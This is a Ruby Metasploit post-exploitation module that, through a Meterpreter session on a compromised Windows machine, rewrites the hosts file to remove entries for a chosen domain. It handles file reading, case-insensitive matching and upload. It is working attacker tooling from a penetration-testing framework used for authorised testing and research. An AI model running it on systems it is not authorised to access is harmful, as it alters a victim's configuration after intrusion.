##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
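class MetasploitModule < Msf::Post
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Manage Host File Entry Removal',
        'Description' => %q{
          This module allows the attacker to remove an entry from the Windows hosts file.
        },
        'License' => BSD_LICENSE,
        'Author' => [ 'vt <nick.freeman[at]security-assessment.com>'],
        'Platform' => [ 'win' ],
        'SessionTypes' => [ 'meterpreter' ],
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              core_channel_close
              core_channel_eof
              core_channel_open
              core_channel_read
              core_channel_tell
              core_channel_write
            ]
          }
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [CONFIG_CHANGES],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        OptString.new('DOMAIN', [ true, 'Domain name to remove from the hosts file.' ])
      ]
    )
  end

  # Absolute path of the hosts file on the target.
  #
  # Resolves %SystemRoot% (falling back to %windir%) through the session so a
  # non-default install location is honoured. An unset *or empty* variable is
  # treated as missing; the last resort is the conventional C:\Windows.
  #
  # @return [String] Windows path to System32\drivers\etc\hosts
  def hosts_path
    root = env_or_nil('SystemRoot') || env_or_nil('windir') || 'C:\\Windows'
    "#{root}\\System32\\drivers\\etc\\hosts"
  end

  # Rewrites the target's hosts file without the hostname given in DOMAIN.
  #
  # The file is read completely, filtered locally and uploaded back only when
  # at least one entry actually changed, so an unmatched DOMAIN leaves the
  # file (and its timestamp) untouched.
  def run
    host = datastore['DOMAIN'].to_s.strip
    # OptString's required flag rejects nil/"" but not whitespace-only input.
    fail_with(Failure::BadConfig, 'DOMAIN must not be blank') if host.empty?

    path = hosts_path
    print_status("Removing hosts file entry pointing to #{host}")

    updated, changed = remove_host_entries(read_remote_file(path), host)
    if changed.zero?
      print_status("No entry for #{host} found in #{path}; hosts file left unchanged")
      return
    end

    upload_contents(path, updated)
    print_good('Done!')
  end

  private

  # Value of the remote environment variable +name+, or nil when it is unset
  # or blank (the original `||` chain would have accepted an empty string).
  #
  # @param name [String] environment variable name
  # @return [String, nil]
  def env_or_nil(name)
    value = client.sys.config.getenv(name)
    value unless value.nil? || value.empty?
  end

  # Reads the whole remote file at +path+.
  #
  # One Meterpreter channel read returns a single block, so this loops until
  # the channel reports EOF (which is why core_channel_eof is in the Compat
  # list). A one-shot read could truncate a large hosts file and the truncated
  # copy would then be written back over the original. The handle is always
  # closed, including when the read raises.
  #
  # The file is opened 'r+b' as in the original; although only read here, a
  # file the session cannot write should then fail before anything is changed.
  #
  # @param path [String] remote path
  # @return [String] file contents (empty string for an empty file)
  def read_remote_file(path)
    fd = client.fs.file.new(path, 'r+b')
    begin
      data = String.new
      loop do
        chunk = fd.read
        # nil/"" guards against a channel that never signals EOF
        break if chunk.nil? || chunk.empty?

        data << chunk
        break if fd.eof?
      end
      data
    ensure
      fd.close
    end
  end

  # Removes +host+ from every entry of a hosts file body.
  #
  # Matching is case-insensitive, as DNS names are; the original compared
  # case-sensitively when deciding whether a line matched but
  # case-insensitively when deleting, so `Example.com` was never removed for
  # DOMAIN=example.com. For each matching entry the address is kept, every
  # alias equal to +host+ is dropped, and the line disappears entirely when no
  # alias is left (same as the original). A trailing `# comment` is
  # re-attached *with* its `#`; the original dropped the marker, which turned
  # the comment words into hostnames. CRLF and LF input are both accepted;
  # output is always CRLF.
  #
  # @param content [String] current hosts file body
  # @param host [String] hostname to remove
  # @return [Array(String, Integer)] new body and the number of lines changed
  def remove_host_entries(content, host)
    changed = 0
    kept = content.split(/\r?\n/).each_with_object([]) do |line, out|
      entry, comment = line.split('#', 2)
      address, *names = entry.to_s.strip.split(/\s+/)

      unless names.any? { |name| name.casecmp?(host) }
        out << line
        next
      end

      changed += 1
      remaining = names.reject { |name| name.casecmp?(host) }
      # no hostname left for this address: drop the whole entry
      next if remaining.empty?

      rebuilt = ([address] + remaining).join(' ')
      rebuilt = "#{rebuilt} ##{comment}" unless comment.nil?
      out << rebuilt
    end

    [kept.map { |line| "#{line}\r\n" }.join, changed]
  end

  # Writes +content+ to the remote +path+ through a local temporary file.
  #
  # The temporary file is unlinked whether or not the upload succeeds; the
  # original left it on disk until garbage collection.
  #
  # @param path [String] remote destination
  # @param content [String] bytes to write
  def upload_contents(path, content)
    temp = Tempfile.new('meterp')
    begin
      temp.binmode
      temp.write(content)
      temp.close
      client.fs.file.upload_file(path, temp.path)
    ensure
      temp.close!
    end
  end
end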